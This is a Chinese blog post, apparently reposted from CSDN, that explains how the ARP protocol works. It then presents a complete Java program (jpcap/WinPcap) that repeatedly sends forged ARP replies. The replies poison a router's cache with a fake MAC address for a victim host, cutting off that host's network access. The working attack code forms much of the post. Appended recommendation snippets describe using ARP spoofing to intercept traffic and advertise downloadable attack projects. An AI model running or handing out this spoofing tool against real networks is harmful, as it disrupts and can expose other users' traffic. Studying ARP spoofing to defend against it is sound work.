基于JAVA的ARP欺骗的程序实现

最新推荐文章于 2021-08-04 11:49:12 发布
最新推荐文章于 2021-08-04 11:49:12 发布
阅读量619 收藏 5
点赞数
文章标签: 网络 路由器 java
原文链接:https://blog.csdn.net/zsg88/article/details/54993162
版权

在实现ARP欺骗之前,我们必须知道什么是ARP。
在局域网当中,当主机或其它网络设备有数据要发送给另一个主机或设备时,它必须要知道对方的IP地址,但仅仅有IP地址是不够的,因为IP数据报文必须封装成帧才能通过物理网络发送,因此发送站还必须有接收站的物理地址,所以需要一个从IP地址到物理地址的映射。ARP就是实现这个功能的协议。
我们通过一个简单的例子来解释一下ARP在局域网中的运作。
1.假设现在有一个主机A和一个主机B,二者处在同一个局域网当中。当主机A需要和主机B进行数据通信的时候,主机A会在自己的ARP缓存中查找是否有与主机B对应的ARP表项。

   2.如果A在自己的ARP缓存当中找到了与主机B对应的ARP表,主机A直接利用ARP表中的MAC地址将IP数据包进行帧封装,将数据包发送给主机B。

   3.如果A在自己的ARP缓存中没有找到与主机B对应的ARP表,则主机A将以广播的方式发送一个ARP请求,该请求中包含了主机A本身的IP地址(源IP地址)和MAC地址(源MAC地址),同时包含了主机B的IP地址(目标IP地址)。由于请求是以广播的形式发送的,所以处于该局域网的所有主机都能够检测到该ARP请求,但是只有和ARP请求中目标IP地址相同的主机才能够收到ARP请求,其余的主机都会讲该ARP请求抛弃。主机B收到由A发送的ARP请求后,会向主机A以单播的形式发送一个ARP回复,该回复中包含了主机B的IP地址(源IP地址),主机B的MAC地址(源MAC地址),主机A的IP地址(目标IP地址),主机A的MAC地址(目标MAC地址)。同时会将主机A的IP地址和MAC地址写入自己的ARP缓存当中。
   4.主机A收到来自主机B的ARP的回复后,将ARP回复中的主机B的IP地址和MAC地址添加到自己的ARP缓存当中。这样主机A便能和主机B进行通信了。
   在对ARP的工作过程进行剖析后,我们就能够对ARP欺骗进行讲解了。
   ARP欺骗分为两种,一种是针对路由器进行欺骗,使路由器的ARP缓存中建立错误的IP与MAC地址映射表,结果就是从路由器发送的数据都发给了一个错误的MAC地址,造成主机无法正常接收信息。另一种是对主机中的ARP缓存进行欺骗,伪造主机路由器IP和MAC地址映射表,使主机发送的数据都发送到伪造后的MAC地址对应的主机上,这种情况不仅会使主机不能正常上网,而且还能用来窃取信息。
   我们用程序实现第一种ARP欺骗,并对第一种欺骗方式进行举例。

   假设现在主机A和主机B通过路由器C连接在同一个局域网内,主机A是欺骗方,主机B是被欺骗方。主机A在自己的ARP缓存中查到路由器C的IP地址IP_C,MAC地址MAC_C,查到主机B的IP地址IP_B。接下来,主机A自己生成一个ARP回复,该回复的源IP并不是主机A的IP地址,而是冒充主机B的IP地址IP_B,同时编造一个不存在的MAC地址作为回复的源MAC地址,目标IP是IP_C,目标MAC地址是MAC_C。这个ARP回复以单播的形式发送给路由器C之后,路由器并不会验证回复的真实性,而是会把IP_B和一个不存在的MAC地址写入自己的ARP缓存,此时,所有通过路由器发送给主机B的数据,都会因为找不到目标而发送失败。

   总结一下:主机A冒充主机B不断向路由器发送一个包含错误的IP和MAC映射表的ARP回复,使经由路由器发给B的数据无法到达目的地,从而致使主机B无法正常上网。

   接下来,我们用Java程序来实现这个欺骗过程。注意:JAVA自身是没有办法对数据链路层进行相关操作的,而ARP包的发送处于数据链路层。我们必须借助WinPcap来实现对数据链路层的相关操作,同时需要jpcap来作为沟通JAVA和WinPcap的媒介。所以应该提前安装WinPcap和jpcap。

   需要补充解释一点:我们会在程序当中伪造一个ARP回复,这里必须了解ARP报文的结构。报文结构如下:

  

   上图详细的说明了报文的构成,我们在生成ARP回复时,是通过jpcap提供的类ARPPacket来生成的,必须要把ARP中的每一个数据填充清楚,否则就会发送不成功。

代码如下:

import java.net.InetAddress;    
import jpcap.JpcapCaptor;    
import jpcap.JpcapSender;    
import jpcap.NetworkInterface;    
import jpcap.packet.ARPPacket;    
import jpcap.packet.EthernetPacket;    
    
public class Test{    
    static byte[] stomac(String s) {    
        byte[] mac = new byte[] { (byte) 0x00, (byte) 0x00, (byte) 0x00, (byte) 0x00, (byte) 0x00, (byte) 0x00 };    
        String[] s1 = s.split("-");    
        for (int x = 0; x < s1.length; x++) {    
            mac[x] = (byte) ((Integer.parseInt(s1[x], 16)) & 0xff);    
        }    
        return mac;    
    }    
    public static void main(String[] args) throws Exception {    
        InetAddress desip = InetAddress.getByName("192.168.0.1");// 被欺骗的目标IP地址    
        byte[] desmac = stomac("c8-3a-35-4a-0c-08");// 被欺骗的目标目标MAC数组    
        InetAddress srcip = InetAddress.getByName("192.168.0.105");// 源IP地址    
        byte[] srcmac = stomac("3c-97-0e-45-01-d4"); // 假的MAC数组    
        // 枚举网卡并打开设备    
        NetworkInterface[] devices = JpcapCaptor.getDeviceList();  //枚举网卡设备  
        NetworkInterface device = devices[2];  //选择网卡设备  
        JpcapSender sender = JpcapSender.openDevice(device);  //打开网卡设备  
        // 设置ARP包    
        ARPPacket arp = new ARPPacket();    
        arp.hardtype = ARPPacket.HARDTYPE_ETHER;    //硬件类型  
        arp.prototype = ARPPacket.PROTOTYPE_IP;   //协议类型  
        arp.operation = ARPPacket.ARP_REPLY;      //操作类型 REPLY 表示类型为应答  
        arp.hlen = 6;  //硬件地址长度  
        arp.plen = 4;  //协议类型长度  
        arp.sender_hardaddr = srcmac;  //发送端MAC地址  
        arp.sender_protoaddr = srcip.getAddress(); //发送端IP地址    
        arp.target_hardaddr = desmac;  //目标硬件地址  
        arp.target_protoaddr = desip.getAddress(); //目标IP地址  
        // 定义以太网首部  
        EthernetPacket ether = new EthernetPacket();    
        ether.frametype = EthernetPacket.ETHERTYPE_ARP;  //设置帧的类型为ARP帧  
        ether.src_mac = srcmac;  //源MAC地址  
        ether.dst_mac = desmac;  //目标MAC地址  
        arp.datalink = ether;  //添加  
        // 发送ARP应答包    
        while (true) {    
            System.out.println("sending arp..");    
            sender.sendPacket(arp);    
            Thread.sleep(10);    
        }    
    }    
}
编程小哪吒
关注
Java网络编程
qq_41703795的博客
06-22 142
网络编程: 网络模型和传输流程: 网络数据传输的流程: ARP 协议是处于数据链路层网络层之间的一种协议,也叫作地址解析协议。它将 IP 地址转换为 MAC 地址。 RARP 协议,就是 Reverse ARP,与 ARP 协议相同,是将 MAC 地址转换为 IP 地址的协议。 具体流程: 2. 同一网段的数据传输 假设在同一网段中的两台主机A和B想要通信,A如果想给B发送数据,必须先将B...
java arp欺骗_ARP欺骗
weixin_30382087的博客
02-13 384
ARP欺骗ARP欺骗原理局域网的网络流通不是根据IP地址进行,而是根据MAC地址进行传输。2.在局域网中某机器A要向主机B发送报文,会查询本地的ARP缓存表,找到B的IP地址对应的MAC地址后,就会进行数据传输。如果未找到,则A广播一个ARP请求报文(携带主机A的IP地址Ia——物理地址Pa),请求IP地址为Ib的主机B回答物理地址Pb。网上所有主机包括B都收到ARP请求,但只有主机B识别自己的I...
使用JAVA通过ARP欺骗类似P2P终结者实现数据封包监听
09-05
目前网络上类似P2P终结者这类软件,主要都是基于ARP欺骗实现的,网络上到处都有关于ARP欺骗的介绍,不过为了本文读者不需要再去查找,我就在这里大概讲解一下
java编程实现arp欺骗_JAVA实现ARP欺骗性的数据封包监听
weixin_29461699的博客
02-28 342
在这里,我实现了一个简单的封包截取程序,根据ARP欺骗的原理,我们所需要做的事情如下:1、 构建一个ARP Reply包2、 将该封包发送到需要欺骗的机器代码如下:Code[copy to clipboard]CODE:public class LocalListener {private final static String GATE_IP = "192.168.11.1";private f...
ARP欺骗的实现
07-06
ARP欺骗是用处很大的一个技术,我们的路由器整天在欺骗我们的PC,没有这个欺骗我们就不能上网。 AD:2013大数据全球技术峰会低价抢票中 ARP欺骗是用处很大的一个技术,我们的路由器整天在欺骗我们的PC,没有这个欺骗我们就不能上网。
基于JAVA的ARP攻击实现
12-13
【ARP攻击实现基于JAVA】 ARP(Address Resolution Protocol,地址解析协议)是TCP/IP协议栈中的一个关键组件,它用于将网络层的IP地址映射到数据链路层的MAC地址,以便于数据在网络中传输。然而,ARP协议的缺陷...
ARP欺诈Java版基于jpcap和WinPcap来实现
David648210的博客
08-04 759
文章目录前言一、准备工作二、代码1.Attack.java2.ArpUtil.java3.Attacker.java4.AttackList.java5.NetUtil.java6.Ping.java7.Raedcsv.java8.UpdateIp.java三、使用注意总结 前言 看了一位大佬的java版的arp欺诈程序就自己照着写了一个 https://blog.csdn.net/qq_37853750/article/details/100169513?ops_request_misc=%257B%.
基于CDIO教学模式的《Java程序设计》课程开发实践.pdf
最新发布
12-29
【基于CDIO教学模式的《Java程序设计》课程开发实践】 CDIO教学模式是一种以工程教育为核心的教学理念,强调学生在学习过程中从构思、设计、实施到运营的全过程参与,以此提升他们的工程能力和实践技能。在《Java...
JAVA代码实现ARP攻击
10-31
JAVA代码实现ARP攻击 这个文档你们自己看一下吧,大家共同学习
JAVA代码实现ARP攻击 工程完整导出可直接导入
11-28
MyEclipse 和 eclipse 可直接导入运行 查看阅读源码,MyEclipse 和 eclipse 可直接导入运行 查看阅读源码,MyEclipse 和 eclipse 可直接导入运行 查看阅读源码,
使用JAVA通过ARP欺骗实现数据封包监听
Ray
06-10 184
http://calmness.iteye.com/blog/218616
无网关的局域网如何获取封包_网络专题(1):局域网 ARP 欺骗原理详解
weixin_39718521的博客
12-04 350
ARP 欺骗是一种以 ARP 地址解析协议为基础的一种网络攻击方式, 那么什么是 ARP 地址解析协议: 首先我们要知道, 一台电脑主机要把以太网数据帧发送到同一局域网的另外一台主机, 它的底层是通过 48bit 的 Mac 地址来确定目的接口的, 但是我们在应用层是使用 IP 地址来访问目标主机的, 所以 ARP 的作用就是当一台主机访问一个目标 IP 地址的时候, 它为该主机返回目标 IP 主...
java编程实现arp欺骗,JAVA实现ARP欺骗性的数据封包监听
weixin_29100927的博客
03-22 316
如上代码实现了创建一个发送到IP为192.168.11.4的机器的ARP reply封包,其中可看到,reply包中的源IP为192.168.11.1,而源MAC则被改成当前机器的MAC地址,既 device.mac_address,这样当192.168.11.4的机器接收到该reply包后,就会刷新ARP表,并且所有发送往 192.168.11.1的数据都会实际发送到当前运行该程序的机器。程序中...
JAVA代码实现ARP攻击
热门推荐
交换一个思想,能得到俩思想
07-05 1万+
ARP攻击原理 一台电脑通过网络访问另一台电脑的时候,在数据链路层需要知道对方的MAC地址进行真正的物理通信. 而电脑上的应用程序通常都是根据另一台电脑的IP地址来和对方建立通信,这时候就需要有一个协议将 IP地址解析到MAC地址,这就是ARP协议. 而ARP具体过程就是当需要通过IP获取一个远端的的MAC地址的时候,系统会首先检查ARP表中 是否存在对应的IP地址,如果没有,则发送一个
ARP欺骗病毒攻击
autofei的专栏
11-10 2349
  近一段时间以来,部分校园网用户受到一种名为ARP欺骗木马程序(病毒)的攻击(ARP是“Address Resolution Protocol”“地址解析协议”的缩写),病毒发作时其症状表现为计算机网络连接正常,却无法打开网页;或由于ARP欺骗的木马程序(病毒)发作时发出大量的数据包,导致用户上网不稳定,网络时断时续,上网速度缓慢,极大地影响了用户的正常使用,给整个校园网安全带来了严重隐患。  
JAVA实现ARP欺骗性的数据封包监听
stephen830
01-10 136
JAVA实现ARP欺骗性的数据封包监听 文/Rexcj 出处/blogjava 转自:http://www.pin5i.com/showtopic-18934.html 如 果说最近有什么不爽的事情,那就是与人共享网络的痛苦了,特别是当其他共享者使用那些P2P工具下载软件,而你却看着网页进度条一点点爬的时候,那种痛苦 对于我这种网虫级别的人来说,那简直就是痛不欲生。绝对不能再忍了...
java实现ARP欺骗(ARP攻击)-Jpcap
左右的博客
08-31 2835
最近了解到了ARP攻击技术,本着学习的目的,笔者需要在Windows下模拟实施ARP欺骗,主要使用的是Jpcap扩展包来完成这项任务。 准备工作 1.安装WinPcap 官网 , 网盘里面也有 2.下载Jpcap,百度网盘地址 提取码 vu2s 下载完成之后,将Jpcap.dll放到你的jdk/bin下面,将Jpcap.jar引用到你的项目中 代码 import jpcap.JpcapCaptor; import jpcap.JpcapSender; import jpcap.NetworkInterfa
JPCAP——JAVA中的数据链路层控制(监听原理) ARP欺骗
mauersu
04-05 284
源:http://hi.baidu.com/leifenglian/item/763e551248b3e2453a176e8a 评: 监听原理   在详细说用JPCAP实现网络监听实现前,先简单介绍下监听的原理。  局域网监听利用的是所谓的 “ARP欺骗”技术。在以前曾经一段阶段,局域网的布局是使用总线式(或集线式)结构,要到达监听只需要将网卡设定为混杂模式即可,但现在的局域网络普遍 采用的...
Bouncy Castle 解析私钥 java代码
05-12
以下是使用 Bouncy Castle 库解析私钥的 Java 代码示例: ```java import java.io.FileInputStream; import java.security.KeyFactory; import java.security.PrivateKey; import java.security.Security; import java.security.spec.PKCS8EncodedKeySpec; import org.bouncycastle.jce.provider.BouncyCastleProvider; public class PrivateKeyReader { public static PrivateKey get(String filename) throws Exception { Security.addProvider(new BouncyCastleProvider()); FileInputStream fis = new FileInputStream(filename); byte[] buffer = new byte[fis.available()]; fis.read(buffer); fis.close(); PKCS8EncodedKeySpec keySpec = new PKCS8EncodedKeySpec(buffer); KeyFactory keyFactory = KeyFactory.getInstance("RSA", "BC"); return keyFactory.generatePrivate(keySpec); } } // 使用示例 PrivateKey privateKey = PrivateKeyReader.get("private_key.der"); ``` 在上面的示例代码中,我们使用了 Bouncy Castle 加密库来解析私钥。首先,我们添加了 Bouncy Castle 提供的加密算法供应商。然后,我们从文件中读取私钥的字节数组,并使用 PKCS8EncodedKeySpec 将其转换为 KeySpec。最后,我们使用 KeyFactory 从 KeySpec 中生成了一个 RSA 私钥对象。 需要注意的是,我们需要将私钥存储为 DER 格式的二进制文件。如果私钥是 PEM 格式的,我们可以使用 Bouncy Castle 提供的 PEMReader 类来读取并转换为 DER 格式。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值